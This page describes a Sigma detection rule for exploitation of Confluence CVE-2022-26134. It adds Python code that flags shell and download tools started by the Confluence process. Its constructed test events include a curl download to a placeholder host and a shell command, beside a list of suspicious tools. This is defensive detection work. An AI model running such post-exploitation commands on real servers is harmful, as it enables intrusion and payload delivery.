Atlassian Confluence CVE-2022-26134

Sigma Rules

Summary
This detection rule targets exploitation of the Atlassian Confluence vulnerability CVE-2022-26134, which can lead to unauthorized access and command execution. The rule monitors for suspicious child processes created by the Confluence server. It analyzes process creation events on Linux and flags cases where the parent process runs from the Confluence installation directory and the spawned command involves tools commonly used in malicious activity, such as shell interpreters or download tools like curl and wget. These patterns indicate exploitation attempts and post-exploitation behavior, so alerts from this rule support timely intervention and threat mitigation.
Categories
  • Linux
  • Application
Data Sources
  • Process
Created: 2022-06-03
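
The parent/child matching described in the summary, as an added example that is not the Sigma rule's own source. The install path `/opt/atlassian/confluence`, the tool list, the event field names and the sample events are assumptions made for illustration. The example matches on argv basenames rather than plain substrings and normalizes the parent path before comparing it.

```python
import posixpath
import shlex

# Assumption: Confluence install directory on this host; adjust per deployment.
CONFLUENCE_DIR = "/opt/atlassian/confluence"
# Assumption: illustrative list built from the summary (shell interpreters, curl, wget).
SUSPICIOUS = {"sh", "bash", "dash", "zsh", "ksh", "curl", "wget"}

def under_confluence(path):
    """True if the normalized parent image path lies inside the install directory."""
    return posixpath.normpath(path).startswith(CONFLUENCE_DIR + "/")

def suspicious_tools(command_line):
    """Return the listed tools that appear as whole argv tokens (by basename)."""
    try:
        argv = shlex.split(command_line)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        argv = command_line.split()
    return sorted({posixpath.basename(a) for a in argv} & SUSPICIOUS)

def detect(events):
    """Return (pid, tools) for each child of Confluence that runs a listed tool."""
    alerts = []
    for ev in events:
        if not under_confluence(ev["parent_image"]):
            continue
        tools = suspicious_tools(ev["command_line"])
        if tools:
            alerts.append((ev["pid"], tools))
    return alerts

# Constructed process creation events (not real telemetry).
JAVA = "/opt/atlassian/confluence/jre/bin/java"
SAMPLE_EVENTS = [
    {"pid": 4101, "parent_image": JAVA, "command_line": "/bin/sh -c id"},
    {"pid": 4102, "parent_image": JAVA,
     "command_line": "curl -o /tmp/f http://example.invalid/f"},
    # Benign: "dashboard" contains "dash" but is not a shell invocation.
    {"pid": 4103, "parent_image": JAVA,
     "command_line": JAVA + " -jar dashboard-export.jar"},
    # Parent outside the install directory: out of scope for this rule.
    {"pid": 4104, "parent_image": "/usr/sbin/sshd", "command_line": "bash -l"},
    # Path only looks like the install directory until it is normalized.
    {"pid": 4105, "parent_image": "/opt/atlassian/confluence/../../../usr/sbin/cron",
     "command_line": "/bin/sh -c run-parts /etc/cron.hourly"},
]

if __name__ == "__main__":
    for pid, tools in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} tools={','.join(tools)}")
```

Token matching is stricter than substring matching: it avoids hits such as `dashboard`, but it only sees a tool nested inside a quoted `sh -c '...'` argument through the outer shell.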